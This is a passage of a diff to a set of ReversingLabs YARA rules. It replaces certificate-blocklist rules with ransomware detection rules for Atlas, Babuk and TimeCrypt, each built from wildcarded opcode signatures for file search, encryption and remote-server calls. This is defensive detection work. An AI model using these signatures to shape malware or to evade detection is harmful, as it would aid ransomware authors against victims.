+            ?? ?? 8B 08 FF 51 ?? 8D 4D ?? 8B D6 A1 ?? ?? ?? ?? 8B 38 FF 57 ?? 8B 45 ?? B1 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 46 4B 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Media Lid" and pe.signatures [ i ] . serial == "2c:e2:bd:0a:d3:cf:de:9e:a7:3e:ec:7c:a3:04:00:da" and 1493337599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files and $encrypt_files and $remote_connection
 }
+rule REVERSINGLABS_Win32_Ransomware_Atlas : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects Atlas ransomware."
+		author = "ReversingLabs"
+		id = "2c702b24-4b7e-505c-a694-0d915cc47315"
+		date = "2020-07-15"
+		modified = "2020-07-15"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Atlas.yara#L1-L99"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1486f931ec096a00d913de0568ddd8aa5a091256445bc28aba90e3e194ebd045"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Atlas"
+		tc_detection_factor = 5
+		importance = 25
 
-rule REVERSINGLABS_Cert_Blocklist_0Fbc30Db127A536C34D7A0Fa81B48193 : INFO FILE
+	strings:
+		$encrypt_files = {
+            8B 74 24 ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 52 56 FF D7 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 8B 84 24 ??
+            ?? ?? ?? 51 52 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 8D 4C 24 ?? 8D 84 24 ?? ?? ??
+            ?? 6A ?? 51 8B 4C 24 ?? 52 50 51 FF 15 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 55 53 56 FF
+            D7 8B 7C 24 ?? 33 C9 3B FD 89 4C 24 ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 33 F6 8A
+            84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 ?? 8A 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34
+            ?? 46 83 FE ?? 7C ?? 8B 74 24 ?? 57 56 8D 44 24 ?? 53 8D 8C 24 ?? ?? ?? ?? 50 51 E8
+            ?? ?? ?? ?? 8B 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 53 56 8D 8C 24 ?? ?? ?? ?? 50 51 E8
+            ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 6A ?? 52 50 53 51 FF 15 ??
+            ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 6A ?? 52 55 53 50 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
+            7C 24 ?? 41 3B FD 89 4C 24 ?? 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 85 FF 74 ?? 8B 54 24 ??
+            8D 4C 24 ?? 6A ?? 51 57 53 52 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 44 24
+            ?? 50 FF D6 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 4C 24 ?? 68 ?? ?? ??
+            ?? 6A ?? 51 FF D6 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$remote_server_1 = {
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C9 8D 94 24 ?? ?? ?? ?? 8A 0C 2E
+            8D 84 24 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ??
+            ?? ?? 7C ?? 8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 F6 33 C0 8D 8C 24 ?? ?? ?? ?? 8A 04 1E 8D 94 24 ?? ?? ?? ?? 50 51
+            68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? ?? ?? 7C ?? 8D 84 24 ?? ??
+            ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 33 F6 F2 AE F7 D1 49 51 8D 8C 24 ?? ??
+            ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ??
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 46 FF 15 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ??
+            33 C0 8D 94 24 ?? ?? ?? ?? F2 AE F7 D1 49 52 8D 84 24 ?? ?? ?? ?? 51 50 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? BE ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ??
+            83 C0 ?? 83 C6 ?? 84 C9 75 ?? 33 C0 EB
+        }
+		$remote_server_2 = {
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 51 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 52 03 D8 E8 ?? ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? 8D BC 24 ?? ?? ?? ?? 83 C4
+            ?? C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 83 E1 ?? 68 ?? ?? ?? ?? F3 A4 8D 8C 24 ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? BB
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
+            ?? ?? ?? 03 D8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B CB 8B F0 8B
+            D1 BF ?? ?? ?? ?? C1 E9 ?? F3 A5 83 C4 ?? 8B CA 83 E1 ?? 8D 84 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? F3 A4 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            BB ?? ?? ?? ?? 2B D8 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 03 D8 E8 ??
+            ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? BF ?? ?? ?? ?? 68 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B
+            C8 68 ?? ?? ?? ?? 83 E1 ?? F3 A4 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? 33 C0
+            83 C4 ?? F2 AE F7 D1 49 83 F9 ?? 0F 82 ?? ?? ?? ?? 33 F6 8D BC 24 ?? ?? ?? ?? 8D 8C
+            34 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 46 83 C7 ?? 81 FE ?? ??
+            ?? ?? 72 ?? 8B 3D ?? ?? ?? ?? FF D7 8D 94 24 ?? ?? ?? ?? 56 52 8B E8 E8 ?? ?? ?? ??
+            83 C4 ?? FF D7 8B F0 8D 44 24 ?? 50 2B F5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            4C 24 ?? 8D 94 24 ?? ?? ?? ?? 51 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ??
+            8D 84 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 F2 AE F7 D1 49 51 8D 8C
+            24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$send_post_packet = {
+            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
+            FE ?? 89 75 ?? 75 ?? 50 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B
+            8B E5 5D C3 6A ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 66 89 45 ?? 52 E8 ?? ??
+            ?? ?? 89 45 ?? 8D 45 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ??
+            33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8D BD ?? ?? ?? ?? 83 C9 ??
+            33 C0 6A ?? F2 AE F7 D1 49 51 8D 8D ?? ?? ?? ?? 51 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            56 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$send_get_request = {
+            68 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83
+            FB ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
+            C0 5B 81 C4 ?? ?? ?? ?? C3 6A ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 66
+            89 44 24 ?? 52 E8 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 6A ?? 50 53 E8 ?? ?? ?? ?? 83
+            F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
+            C0 5B 81 C4 ?? ?? ?? ?? C3 8B FD 83 C9 ?? 33 C0 6A ?? F2 AE F7 D1 49 51 55 53 E8 ??
+            ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server_1 and $remote_server_2 and $send_post_packet and $send_get_request
+}
+rule REVERSINGLABS_Win32_Ransomware_Babuk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Babuk ransomware."
 		author = "ReversingLabs"
-		id = "c755a6c1-e113-5513-9a61-87bf6d7dcb3e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8a96f400-193f-5fd1-ba03-4da464345e1c"
+		date = "2021-01-26"
+		modified = "2021-01-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2248-L2264"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6b109b5636aa297a6e07f9d9213f7f07a7767b58442d03dc2f34f8a9b3eaba2b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Babuk.yara#L1-L117"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "70327b3f9d0b0505ade7ee6de6d7facf56820c7e8477bd172f738f374311144f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Babuk"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8B
+            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ??
+            ?? ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 73 ?? 8B 85 ?? ?? ?? ?? 8B
+            0C 85 ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 74 ?? 83 7D ?? ?? 77 ?? 8B 45 ?? 83
+            C0 ?? 50 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 7C ?? 8B 95 ?? ?? ?? ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8D 94 4D ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ??
+            EB ?? EB ?? EB ?? EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
+            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 50 FF 15
+        }
+		$encrypt_files_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ??
+            ?? ?? 7F ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D
+            ?? ?? ?? ?? 83 C1 ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
+        }
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 68
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
+            51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? ??
+            ?? 7F ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ??
+            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+        }
+		$encrypt_files_p3 = {
+            C4 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 45
+            ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ??
+            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 6A
+            ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            3B 95 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BC 05 ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 69 8D ?? ?? ?? ?? ?? ?? ?? ?? 81 BC 0D ?? ?? ?? ?? ?? ?? ??
+            ?? 74 ?? FF 15 ?? ?? ?? ?? 69 95 ?? ?? ?? ?? ?? ?? ?? ?? 3B 84 15 ?? ?? ?? ?? 74 ??
+            69 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8C 05 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ??
+            ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$enum_resources = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45
+            ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ??
+            ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 73 ?? 8B 45 ?? C1 E0 ?? 8B
+            4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 6A ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? EB ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 4D ?? 33
+            CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Megabit, OOO" and pe.signatures [ i ] . serial == "0f:bc:30:db:12:7a:53:6c:34:d7:a0:fa:81:b4:81:93" and 1466121599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
 }
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects TimeCrypt ransomware."
+		author = "ReversingLabs"
+		id = "38a0c383-8be6-5258-aa93-0cf09b18e5f7"
+		date = "2021-12-06"
+		modified = "2021-12-06"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara#L1-L69"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6849d6d5010d7bcb4052c10d5bd7cc29320ffc986f36289b272a1e9a8d14fab9"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TimeCrypt"
+		tc_detection_factor = 5
+		importance = 25
 
-rule REVERSINGLABS_Cert_Blocklist_08448Bd6Ee9105Ae31228Ea5Fe496F63 : INFO FILE
+	strings:
+		$find_files = {
+            7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09
+            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ??
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F
+            ?? ?? ?? ?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F
+            ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A
+        }
+		$send_http_request = {
+            1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
